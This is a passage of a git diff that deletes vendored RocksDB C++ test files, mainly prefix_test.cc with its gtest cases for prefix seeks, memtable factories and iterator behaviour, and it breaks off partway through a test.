-  ASSERT_NE("v5", Get("3000000000000bar"));
-}
-
-INSTANTIATE_TEST_CASE_P(PlainTableDBTest, PlainTableDBTest, ::testing::Bool());
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as plain table is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/prefix_test.cc b/thirdparty/rocksdb/db/prefix_test.cc
deleted file mode 100644
index a4ed201..0000000
--- a/thirdparty/rocksdb/db/prefix_test.cc
+++ /dev/null
@@ -1,899 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run this test... Skipping...\n");
-  return 0;
-}
-#else
-
-#include <algorithm>
-#include <iostream>
-#include <vector>
-
-#include <gflags/gflags.h>
-#include "db/db_impl.h"
-#include "monitoring/histogram.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "util/random.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "utilities/merge_operators.h"
-#include "util/coding.h"
-
-using GFLAGS::ParseCommandLineFlags;
-
-DEFINE_bool(trigger_deadlock, false,
-            "issue delete in range scan to trigger PrefixHashMap deadlock");
-DEFINE_int32(bucket_count, 100000, "number of buckets");
-DEFINE_uint64(num_locks, 10001, "number of locks");
-DEFINE_bool(random_prefix, false, "randomize prefix");
-DEFINE_uint64(total_prefixes, 100000, "total number of prefixes");
-DEFINE_uint64(items_per_prefix, 1, "total number of values per prefix");
-DEFINE_int64(write_buffer_size, 33554432, "");
-DEFINE_int32(max_write_buffer_number, 2, "");
-DEFINE_int32(min_write_buffer_number_to_merge, 1, "");
-DEFINE_int32(skiplist_height, 4, "");
-DEFINE_double(memtable_prefix_bloom_size_ratio, 0.1, "");
-DEFINE_int32(memtable_huge_page_size, 2 * 1024 * 1024, "");
-DEFINE_int32(value_size, 40, "");
-DEFINE_bool(enable_print, false, "Print options generated to console.");
-
-// Path to the database on file system
-const std::string kDbName = rocksdb::test::TmpDir() + "/prefix_test";
-
-namespace rocksdb {
-
-struct TestKey {
-  uint64_t prefix;
-  uint64_t sorted;
-
-  TestKey(uint64_t _prefix, uint64_t _sorted)
-      : prefix(_prefix), sorted(_sorted) {}
-};
-
-// return a slice backed by test_key
-inline Slice TestKeyToSlice(std::string &s, const TestKey& test_key) {
-  s.clear();
-  PutFixed64(&s, test_key.prefix);
-  PutFixed64(&s, test_key.sorted);
-  return Slice(s.c_str(), s.size());
-}
-
-inline const TestKey SliceToTestKey(const Slice& slice) {
-  return TestKey(DecodeFixed64(slice.data()),
-    DecodeFixed64(slice.data() + 8));
-}
-
-class TestKeyComparator : public Comparator {
- public:
-
-  // Compare needs to be aware of the possibility of a and/or b is
-  // prefix only
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    const TestKey kkey_a = SliceToTestKey(a);
-    const TestKey kkey_b = SliceToTestKey(b);
-    const TestKey *key_a = &kkey_a;
-    const TestKey *key_b = &kkey_b;
-    if (key_a->prefix != key_b->prefix) {
-      if (key_a->prefix < key_b->prefix) return -1;
-      if (key_a->prefix > key_b->prefix) return 1;
-    } else {
-      EXPECT_TRUE(key_a->prefix == key_b->prefix);
-      // note, both a and b could be prefix only
-      if (a.size() != b.size()) {
-        // one of them is prefix
-        EXPECT_TRUE(
-            (a.size() == sizeof(uint64_t) && b.size() == sizeof(TestKey)) ||
-            (b.size() == sizeof(uint64_t) && a.size() == sizeof(TestKey)));
-        if (a.size() < b.size()) return -1;
-        if (a.size() > b.size()) return 1;
-      } else {
-        // both a and b are prefix
-        if (a.size() == sizeof(uint64_t)) {
-          return 0;
-        }
-
-        // both a and b are whole key
-        EXPECT_TRUE(a.size() == sizeof(TestKey) && b.size() == sizeof(TestKey));
-        if (key_a->sorted < key_b->sorted) return -1;
-        if (key_a->sorted > key_b->sorted) return 1;
-        if (key_a->sorted == key_b->sorted) return 0;
-      }
-    }
-    return 0;
-  }
-
-  bool operator()(const TestKey& a, const TestKey& b) const {
-    std::string sa, sb;
-    return Compare(TestKeyToSlice(sa, a), TestKeyToSlice(sb, b)) < 0;
-  }
-
-  virtual const char* Name() const override {
-    return "TestKeyComparator";
-  }
-
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {}
-
-  virtual void FindShortSuccessor(std::string* key) const override {}
-};
-
-namespace {
-void PutKey(DB* db, WriteOptions write_options, uint64_t prefix,
-            uint64_t suffix, const Slice& value) {
-  TestKey test_key(prefix, suffix);
-  std::string s;
-  Slice key = TestKeyToSlice(s, test_key);
-  ASSERT_OK(db->Put(write_options, key, value));
-}
-
-void PutKey(DB* db, WriteOptions write_options, const TestKey& test_key,
-            const Slice& value) {
-  std::string s;
-  Slice key = TestKeyToSlice(s, test_key);
-  ASSERT_OK(db->Put(write_options, key, value));
-}
-
-void MergeKey(DB* db, WriteOptions write_options, const TestKey& test_key,
-              const Slice& value) {
-  std::string s;
-  Slice key = TestKeyToSlice(s, test_key);
-  ASSERT_OK(db->Merge(write_options, key, value));
-}
-
-void DeleteKey(DB* db, WriteOptions write_options, const TestKey& test_key) {
-  std::string s;
-  Slice key = TestKeyToSlice(s, test_key);
-  ASSERT_OK(db->Delete(write_options, key));
-}
-
-void SeekIterator(Iterator* iter, uint64_t prefix, uint64_t suffix) {
-  TestKey test_key(prefix, suffix);
-  std::string s;
-  Slice key = TestKeyToSlice(s, test_key);
-  iter->Seek(key);
-}
-
-const std::string kNotFoundResult = "NOT_FOUND";
-
-std::string Get(DB* db, const ReadOptions& read_options, uint64_t prefix,
-                uint64_t suffix) {
-  TestKey test_key(prefix, suffix);
-  std::string s2;
-  Slice key = TestKeyToSlice(s2, test_key);
-
-  std::string result;
-  Status s = db->Get(read_options, key, &result);
-  if (s.IsNotFound()) {
-    result = kNotFoundResult;
-  } else if (!s.ok()) {
-    result = s.ToString();
-  }
-  return result;
-}
-
-class SamePrefixTransform : public SliceTransform {
- private:
-  const Slice prefix_;
-  std::string name_;
-
- public:
-  explicit SamePrefixTransform(const Slice& prefix)
-      : prefix_(prefix), name_("rocksdb.SamePrefix." + prefix.ToString()) {}
-
-  virtual const char* Name() const override { return name_.c_str(); }
-
-  virtual Slice Transform(const Slice& src) const override {
-    assert(InDomain(src));
-    return prefix_;
-  }
-
-  virtual bool InDomain(const Slice& src) const override {
-    if (src.size() >= prefix_.size()) {
-      return Slice(src.data(), prefix_.size()) == prefix_;
-    }
-    return false;
-  }
-
-  virtual bool InRange(const Slice& dst) const override {
-    return dst == prefix_;
-  }
-};
-
-}  // namespace
-
-class PrefixTest : public testing::Test {
- public:
-  std::shared_ptr<DB> OpenDb() {
-    DB* db;
-
-    options.create_if_missing = true;
-    options.write_buffer_size = FLAGS_write_buffer_size;
-    options.max_write_buffer_number = FLAGS_max_write_buffer_number;
-    options.min_write_buffer_number_to_merge =
-      FLAGS_min_write_buffer_number_to_merge;
-
-    options.memtable_prefix_bloom_size_ratio =
-        FLAGS_memtable_prefix_bloom_size_ratio;
-    options.memtable_huge_page_size = FLAGS_memtable_huge_page_size;
-
-    options.prefix_extractor.reset(NewFixedPrefixTransform(8));
-    BlockBasedTableOptions bbto;
-    bbto.filter_policy.reset(NewBloomFilterPolicy(10, false));
-    bbto.whole_key_filtering = false;
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    options.allow_concurrent_memtable_write = false;
-
-    Status s = DB::Open(options, kDbName,  &db);
-    EXPECT_OK(s);
-    return std::shared_ptr<DB>(db);
-  }
-
-  void FirstOption() {
-    option_config_ = kBegin;
-  }
-
-  bool NextOptions(int bucket_count) {
-    // skip some options
-    option_config_++;
-    if (option_config_ < kEnd) {
-      options.prefix_extractor.reset(NewFixedPrefixTransform(8));
-      switch(option_config_) {
-        case kHashSkipList:
-          options.memtable_factory.reset(
-              NewHashSkipListRepFactory(bucket_count, FLAGS_skiplist_height));
-          return true;
-        case kHashLinkList:
-          options.memtable_factory.reset(
-              NewHashLinkListRepFactory(bucket_count));
-          return true;
-        case kHashLinkListHugePageTlb:
-          options.memtable_factory.reset(
-              NewHashLinkListRepFactory(bucket_count, 2 * 1024 * 1024));
-          return true;
-        case kHashLinkListTriggerSkipList:
-          options.memtable_factory.reset(
-              NewHashLinkListRepFactory(bucket_count, 0, 3));
-          return true;
-        default:
-          return false;
-      }
-    }
-    return false;
-  }
-
-  PrefixTest() : option_config_(kBegin) {
-    options.comparator = new TestKeyComparator();
-  }
-  ~PrefixTest() {
-    delete options.comparator;
-  }
- protected:
-  enum OptionConfig {
-    kBegin,
-    kHashSkipList,
-    kHashLinkList,
-    kHashLinkListHugePageTlb,
-    kHashLinkListTriggerSkipList,
-    kEnd
-  };
-  int option_config_;
-  Options options;
-};
-
-TEST(SamePrefixTest, InDomainTest) {
-  DB* db;
-  Options options;
-  options.create_if_missing = true;
-  options.prefix_extractor.reset(new SamePrefixTransform("HHKB"));
-  BlockBasedTableOptions bbto;
-  bbto.filter_policy.reset(NewBloomFilterPolicy(10, false));
-  bbto.whole_key_filtering = false;
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  WriteOptions write_options;
-  ReadOptions read_options;
-  {
-    ASSERT_OK(DestroyDB(kDbName, Options()));
-    ASSERT_OK(DB::Open(options, kDbName, &db));
-    ASSERT_OK(db->Put(write_options, "HHKB pro2", "Mar 24, 2006"));
-    ASSERT_OK(db->Put(write_options, "HHKB pro2 Type-S", "June 29, 2011"));
-    ASSERT_OK(db->Put(write_options, "Realforce 87u", "idk"));
-    db->Flush(FlushOptions());
-    std::string result;
-    auto db_iter = db->NewIterator(ReadOptions());
-
-    db_iter->Seek("Realforce 87u");
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_OK(db_iter->status());
-    ASSERT_EQ(db_iter->key(), "Realforce 87u");
-    ASSERT_EQ(db_iter->value(), "idk");
-
-    delete db_iter;
-    delete db;
-    ASSERT_OK(DestroyDB(kDbName, Options()));
-  }
-
-  {
-    ASSERT_OK(DB::Open(options, kDbName, &db));
-    ASSERT_OK(db->Put(write_options, "pikachu", "1"));
-    ASSERT_OK(db->Put(write_options, "Meowth", "1"));
-    ASSERT_OK(db->Put(write_options, "Mewtwo", "idk"));
-    db->Flush(FlushOptions());
-    std::string result;
-    auto db_iter = db->NewIterator(ReadOptions());
-
-    db_iter->Seek("Mewtwo");
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_OK(db_iter->status());
-    delete db_iter;
-    delete db;
-    ASSERT_OK(DestroyDB(kDbName, Options()));
-  }
-}
-
-TEST_F(PrefixTest, TestResult) {
-  for (int num_buckets = 1; num_buckets <= 2; num_buckets++) {
-    FirstOption();
-    while (NextOptions(num_buckets)) {
-      std::cout << "*** Mem table: " << options.memtable_factory->Name()
-                << " number of buckets: " << num_buckets
-                << std::endl;
-      DestroyDB(kDbName, Options());
-      auto db = OpenDb();
-      WriteOptions write_options;
-      ReadOptions read_options;
-
-      // 1. Insert one row.
-      Slice v16("v16");
-      PutKey(db.get(), write_options, 1, 6, v16);
-      std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-      SeekIterator(iter.get(), 1, 6);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v16 == iter->value());
-      SeekIterator(iter.get(), 1, 5);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v16 == iter->value());
-      SeekIterator(iter.get(), 1, 5);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v16 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(!iter->Valid());
-
-      SeekIterator(iter.get(), 2, 0);
-      ASSERT_TRUE(!iter->Valid());
-
-      ASSERT_EQ(v16.ToString(), Get(db.get(), read_options, 1, 6));
-      ASSERT_EQ(kNotFoundResult, Get(db.get(), read_options, 1, 5));
-      ASSERT_EQ(kNotFoundResult, Get(db.get(), read_options, 1, 7));
-      ASSERT_EQ(kNotFoundResult, Get(db.get(), read_options, 0, 6));
-      ASSERT_EQ(kNotFoundResult, Get(db.get(), read_options, 2, 6));
-
-      // 2. Insert an entry for the same prefix as the last entry in the bucket.
-      Slice v17("v17");
-      PutKey(db.get(), write_options, 1, 7, v17);
-      iter.reset(db->NewIterator(read_options));
-      SeekIterator(iter.get(), 1, 7);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-
-      SeekIterator(iter.get(), 1, 6);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v16 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(!iter->Valid());
-
-      SeekIterator(iter.get(), 2, 0);
-      ASSERT_TRUE(!iter->Valid());
-
-      // 3. Insert an entry for the same prefix as the head of the bucket.
-      Slice v15("v15");
-      PutKey(db.get(), write_options, 1, 5, v15);
-      iter.reset(db->NewIterator(read_options));
-
-      SeekIterator(iter.get(), 1, 7);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-
-      SeekIterator(iter.get(), 1, 5);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v15 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v16 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-
-      SeekIterator(iter.get(), 1, 5);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v15 == iter->value());
-
-      ASSERT_EQ(v15.ToString(), Get(db.get(), read_options, 1, 5));
-      ASSERT_EQ(v16.ToString(), Get(db.get(), read_options, 1, 6));
-      ASSERT_EQ(v17.ToString(), Get(db.get(), read_options, 1, 7));
-
-      // 4. Insert an entry with a larger prefix
-      Slice v22("v22");
-      PutKey(db.get(), write_options, 2, 2, v22);
-      iter.reset(db->NewIterator(read_options));
-
-      SeekIterator(iter.get(), 2, 2);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v22 == iter->value());
-      SeekIterator(iter.get(), 2, 0);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v22 == iter->value());
-
-      SeekIterator(iter.get(), 1, 5);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v15 == iter->value());
-
-      SeekIterator(iter.get(), 1, 7);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-
-      // 5. Insert an entry with a smaller prefix
-      Slice v02("v02");
-      PutKey(db.get(), write_options, 0, 2, v02);
-      iter.reset(db->NewIterator(read_options));
-
-      SeekIterator(iter.get(), 0, 2);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v02 == iter->value());
-      SeekIterator(iter.get(), 0, 0);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v02 == iter->value());
-
-      SeekIterator(iter.get(), 2, 0);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v22 == iter->value());
-
-      SeekIterator(iter.get(), 1, 5);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v15 == iter->value());
-
-      SeekIterator(iter.get(), 1, 7);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-
-      // 6. Insert to the beginning and the end of the first prefix
-      Slice v13("v13");
-      Slice v18("v18");
-      PutKey(db.get(), write_options, 1, 3, v13);
-      PutKey(db.get(), write_options, 1, 8, v18);
-      iter.reset(db->NewIterator(read_options));
-      SeekIterator(iter.get(), 1, 7);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-
-      SeekIterator(iter.get(), 1, 3);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v13 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v15 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v16 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v18 == iter->value());
-
-      SeekIterator(iter.get(), 0, 0);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v02 == iter->value());
-
-      SeekIterator(iter.get(), 2, 0);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v22 == iter->value());
-
-      ASSERT_EQ(v22.ToString(), Get(db.get(), read_options, 2, 2));
-      ASSERT_EQ(v02.ToString(), Get(db.get(), read_options, 0, 2));
-      ASSERT_EQ(v13.ToString(), Get(db.get(), read_options, 1, 3));
-      ASSERT_EQ(v15.ToString(), Get(db.get(), read_options, 1, 5));
-      ASSERT_EQ(v16.ToString(), Get(db.get(), read_options, 1, 6));
-      ASSERT_EQ(v17.ToString(), Get(db.get(), read_options, 1, 7));
-      ASSERT_EQ(v18.ToString(), Get(db.get(), read_options, 1, 8));
-    }
-  }
-}
-
-// Show results in prefix
-TEST_F(PrefixTest, PrefixValid) {
-  for (int num_buckets = 1; num_buckets <= 2; num_buckets++) {
-    FirstOption();
-    while (NextOptions(num_buckets)) {
-      std::cout << "*** Mem table: " << options.memtable_factory->Name()
-                << " number of buckets: " << num_buckets << std::endl;
-      DestroyDB(kDbName, Options());
-      auto db = OpenDb();
-      WriteOptions write_options;
-      ReadOptions read_options;
-
-      // Insert keys with common prefix and one key with different
-      Slice v16("v16");
-      Slice v17("v17");
-      Slice v18("v18");
-      Slice v19("v19");
-      PutKey(db.get(), write_options, 12345, 6, v16);
-      PutKey(db.get(), write_options, 12345, 7, v17);
-      PutKey(db.get(), write_options, 12345, 8, v18);
-      PutKey(db.get(), write_options, 12345, 9, v19);
-      PutKey(db.get(), write_options, 12346, 8, v16);
-      db->Flush(FlushOptions());
-      TestKey test_key(12346, 8);
-      std::string s;
-      db->Delete(write_options, TestKeyToSlice(s, test_key));
-      db->Flush(FlushOptions());
-      read_options.prefix_same_as_start = true;
-      std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-      SeekIterator(iter.get(), 12345, 6);
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v16 == iter->value());
-
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v17 == iter->value());
-
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v18 == iter->value());
-
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_TRUE(v19 == iter->value());
-      iter->Next();
-      ASSERT_FALSE(iter->Valid());
-      ASSERT_EQ(kNotFoundResult, Get(db.get(), read_options, 12346, 8));
-
-      // Verify seeking past the prefix won't return a result.
-      SeekIterator(iter.get(), 12345, 10);
-      ASSERT_TRUE(!iter->Valid());
-    }
-  }
-}
-
-TEST_F(PrefixTest, DynamicPrefixIterator) {
-  while (NextOptions(FLAGS_bucket_count)) {
-    std::cout << "*** Mem table: " << options.memtable_factory->Name()
-        << std::endl;
-    DestroyDB(kDbName, Options());
-    auto db = OpenDb();
-    WriteOptions write_options;
-    ReadOptions read_options;
-
-    std::vector<uint64_t> prefixes;
-    for (uint64_t i = 0; i < FLAGS_total_prefixes; ++i) {
-      prefixes.push_back(i);
-    }
-
-    if (FLAGS_random_prefix) {
-      std::random_shuffle(prefixes.begin(), prefixes.end());
-    }
-
-    HistogramImpl hist_put_time;
-    HistogramImpl hist_put_comparison;
-
-    // insert x random prefix, each with y continuous element.
-    for (auto prefix : prefixes) {
-       for (uint64_t sorted = 0; sorted < FLAGS_items_per_prefix; sorted++) {
-        TestKey test_key(prefix, sorted);
-
-        std::string s;
-        Slice key = TestKeyToSlice(s, test_key);
-        std::string value(FLAGS_value_size, 0);
-
-        get_perf_context()->Reset();
-        StopWatchNano timer(Env::Default(), true);
-        ASSERT_OK(db->Put(write_options, key, value));
-        hist_put_time.Add(timer.ElapsedNanos());
-        hist_put_comparison.Add(get_perf_context()->user_key_comparison_count);
-      }
-    }
-
-    std::cout << "Put key comparison: \n" << hist_put_comparison.ToString()
-              << "Put time: \n" << hist_put_time.ToString();
-
-    // test seek existing keys
-    HistogramImpl hist_seek_time;
-    HistogramImpl hist_seek_comparison;
-
-    std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-
-    for (auto prefix : prefixes) {
-      TestKey test_key(prefix, FLAGS_items_per_prefix / 2);
-      std::string s;
-      Slice key = TestKeyToSlice(s, test_key);
-      std::string value = "v" + ToString(0);
-
-      get_perf_context()->Reset();
-      StopWatchNano timer(Env::Default(), true);
-      auto key_prefix = options.prefix_extractor->Transform(key);
-      uint64_t total_keys = 0;
-      for (iter->Seek(key);
-           iter->Valid() && iter->key().starts_with(key_prefix);
-           iter->Next()) {
-        if (FLAGS_trigger_deadlock) {
-          std::cout << "Behold the deadlock!\n";
-          db->Delete(write_options, iter->key());
-        }
-        total_keys++;
-      }
-      hist_seek_time.Add(timer.ElapsedNanos());
-      hist_seek_comparison.Add(get_perf_context()->user_key_comparison_count);
-      ASSERT_EQ(total_keys, FLAGS_items_per_prefix - FLAGS_items_per_prefix/2);
-    }
-
-    std::cout << "Seek key comparison: \n"
-              << hist_seek_comparison.ToString()
-              << "Seek time: \n"
-              << hist_seek_time.ToString();
-
-    // test non-existing keys
-    HistogramImpl hist_no_seek_time;
-    HistogramImpl hist_no_seek_comparison;
-
-    for (auto prefix = FLAGS_total_prefixes;
-         prefix < FLAGS_total_prefixes + 10000;
-         prefix++) {
-      TestKey test_key(prefix, 0);
-      std::string s;
-      Slice key = TestKeyToSlice(s, test_key);
-
-      get_perf_context()->Reset();
-      StopWatchNano timer(Env::Default(), true);
-      iter->Seek(key);
-      hist_no_seek_time.Add(timer.ElapsedNanos());
-      hist_no_seek_comparison.Add(get_perf_context()->user_key_comparison_count);
-      ASSERT_TRUE(!iter->Valid());
-    }
-
-    std::cout << "non-existing Seek key comparison: \n"
-              << hist_no_seek_comparison.ToString()
-              << "non-existing Seek time: \n"
-              << hist_no_seek_time.ToString();
-  }
-}
-
-TEST_F(PrefixTest, PrefixSeekModePrev) {
-  // Only for SkipListFactory
-  options.memtable_factory.reset(new SkipListFactory);
-  options.merge_operator = MergeOperators::CreatePutOperator();
-  options.write_buffer_size = 1024 * 1024;
-  Random rnd(1);
-  for (size_t m = 1; m < 100; m++) {
-    std::cout << "[" + std::to_string(m) + "]" + "*** Mem table: "
-              << options.memtable_factory->Name() << std::endl;
-    DestroyDB(kDbName, Options());
-    auto db = OpenDb();
-    WriteOptions write_options;
-    ReadOptions read_options;
-    std::map<TestKey, std::string, TestKeyComparator> entry_maps[3], whole_map;
-    for (uint64_t i = 0; i < 10; i++) {
-      int div = i % 3 + 1;
-      for (uint64_t j = 0; j < 10; j++) {
-        whole_map[TestKey(i, j)] = entry_maps[rnd.Uniform(div)][TestKey(i, j)] =
-            'v' + std::to_string(i) + std::to_string(j);
-      }
-    }
-
-    std::map<TestKey, std::string, TestKeyComparator> type_map;
-    for (size_t i = 0; i < 3; i++) {
-      for (auto& kv : entry_maps[i]) {
-        if (rnd.OneIn(3)) {
-          PutKey(db.get(), write_options, kv.first, kv.second);
-          type_map[kv.first] = "value";
-        } else {
-          MergeKey(db.get(), write_options, kv.first, kv.second);
-          type_map[kv.first] = "merge";
-        }
-      }
-      if (i < 2) {
-        db->Flush(FlushOptions());
-      }
-    }
-
-    for (size_t i = 0; i < 2; i++) {
-      for (auto& kv : entry_maps[i]) {
-        if (rnd.OneIn(10)) {
-          whole_map.erase(kv.first);
-          DeleteKey(db.get(), write_options, kv.first);
-          entry_maps[2][kv.first] = "delete";
-        }
-      }
-    }
-
-    if (FLAGS_enable_print) {
-      for (size_t i = 0; i < 3; i++) {
-        for (auto& kv : entry_maps[i]) {
-          std::cout << "[" << i << "]" << kv.first.prefix << kv.first.sorted
-                    << " " << kv.second + " " + type_map[kv.first] << std::endl;
-        }
-      }
-    }
-
-    std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-    for (uint64_t prefix = 0; prefix < 10; prefix++) {
-      uint64_t start_suffix = rnd.Uniform(9);
-      SeekIterator(iter.get(), prefix, start_suffix);
-      auto it = whole_map.find(TestKey(prefix, start_suffix));
-      if (it == whole_map.end()) {
-        continue;
-      }
-      ASSERT_NE(it, whole_map.end());
-      ASSERT_TRUE(iter->Valid());
-      if (FLAGS_enable_print) {
-        std::cout << "round " << prefix
-                  << " iter: " << SliceToTestKey(iter->key()).prefix
-                  << SliceToTestKey(iter->key()).sorted
-                  << " | map: " << it->first.prefix << it->first.sorted << " | "
-                  << iter->value().ToString() << " " << it->second << std::endl;
-      }
-      ASSERT_EQ(iter->value(), it->second);
-      uint64_t stored_prefix = prefix;
-      for (size_t k = 0; k < 9; k++) {
-        if (rnd.OneIn(2) || it == whole_map.begin()) {
-          iter->Next();
-          it++;
-          if (FLAGS_enable_print) {
-            std::cout << "Next >> ";
-          }
-        } else {
-          iter->Prev();
-          it--;
-          if (FLAGS_enable_print) {
-            std::cout << "Prev >> ";
-          }
-        }
-        if (!iter->Valid() ||
-            SliceToTestKey(iter->key()).prefix != stored_prefix) {
-          break;
-        }
-        stored_prefix = SliceToTestKey(iter->key()).prefix;
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_NE(it, whole_map.end());
-        ASSERT_EQ(iter->value(), it->second);
-        if (FLAGS_enable_print) {
-          std::cout << "iter: " << SliceToTestKey(iter->key()).prefix
-                    << SliceToTestKey(iter->key()).sorted
-                    << " | map: " << it->first.prefix << it->first.sorted
-                    << " | " << iter->value().ToString() << " " << it->second
-                    << std::endl;
-        }
-      }
-    }
-  }
-}
-
-TEST_F(PrefixTest, PrefixSeekModePrev2) {
-  // Only for SkipListFactory
-  // test the case
-  //        iter1                iter2
-  // | prefix | suffix |  | prefix | suffix |
-  // |   1    |   1    |  |   1    |   2    |
-  // |   1    |   3    |  |   1    |   4    |
-  // |   2    |   1    |  |   3    |   3    |
-  // |   2    |   2    |  |   3    |   4    |
-  // after seek(15), iter1 will be at 21 and iter2 will be 33.
-  // Then if call Prev() in prefix mode where SeekForPrev(21) gets called,
-  // iter2 should turn to invalid state because of bloom filter.
-  options.memtable_factory.reset(new SkipListFactory);
-  options.write_buffer_size = 1024 * 1024;
-  std::string v13("v13");
-  DestroyDB(kDbName, Options());
-  auto db = OpenDb();
-  WriteOptions write_options;
-  ReadOptions read_options;
-  PutKey(db.get(), write_options, TestKey(1, 2), "v12");
-  PutKey(db.get(), write_options, TestKey(1, 4), "v14");
-  PutKey(db.get(), write_options, TestKey(3, 3), "v33");
-  PutKey(db.get(), write_options, TestKey(3, 4), "v34");
-  db->Flush(FlushOptions());
-  reinterpret_cast<DBImpl*>(db.get())->TEST_WaitForFlushMemTable();
-  PutKey(db.get(), write_options, TestKey(1, 1), "v11");
-  PutKey(db.get(), write_options, TestKey(1, 3), "v13");
-  PutKey(db.get(), write_options, TestKey(2, 1), "v21");
-  PutKey(db.get(), write_options, TestKey(2, 2), "v22");
-  db->Flush(FlushOptions());
-  reinterpret_cast<DBImpl*>(db.get())->TEST_WaitForFlushMemTable();
-  std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-  SeekIterator(iter.get(), 1, 5);
-  iter->Prev();
-  ASSERT_EQ(iter->value(), v13);
-}
-
-TEST_F(PrefixTest, PrefixSeekModePrev3) {
-  // Only for SkipListFactory
-  // test SeekToLast() with iterate_upper_bound_ in prefix_seek_mode
-  options.memtable_factory.reset(new SkipListFactory);
-  options.write_buffer_size = 1024 * 1024;
-  std::string v14("v14");
-  TestKey upper_bound_key = TestKey(1, 5);
-  std::string s;
-  Slice upper_bound = TestKeyToSlice(s, upper_bound_key);
-
-  {
-    DestroyDB(kDbName, Options());
-    auto db = OpenDb();
-    WriteOptions write_options;
-    ReadOptions read_options;
-    read_options.iterate_upper_bound = &upper_bound;
-    PutKey(db.get(), write_options, TestKey(1, 2), "v12");
-    PutKey(db.get(), write_options, TestKey(1, 4), "v14");
-    db->Flush(FlushOptions());
-    reinterpret_cast<DBImpl*>(db.get())->TEST_WaitForFlushMemTable();
-    PutKey(db.get(), write_options, TestKey(1, 1), "v11");
-    PutKey(db.get(), write_options, TestKey(1, 3), "v13");
-    PutKey(db.get(), write_options, TestKey(2, 1), "v21");
-    PutKey(db.get(), write_options, TestKey(2, 2), "v22");
-    db->Flush(FlushOptions());
-    reinterpret_cast<DBImpl*>(db.get())->TEST_WaitForFlushMemTable();
-    std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-    iter->SeekToLast();
-    ASSERT_EQ(iter->value(), v14);
-  }
-  {
-    DestroyDB(kDbName, Options());
-    auto db = OpenDb();
-    WriteOptions write_options;
-    ReadOptions read_options;
-    read_options.iterate_upper_bound = &upper_bound;
-    PutKey(db.get(), write_options, TestKey(1, 2), "v12");
-    PutKey(db.get(), write_options, TestKey(1, 4), "v14");
-    PutKey(db.get(), write_options, TestKey(3, 3), "v33");
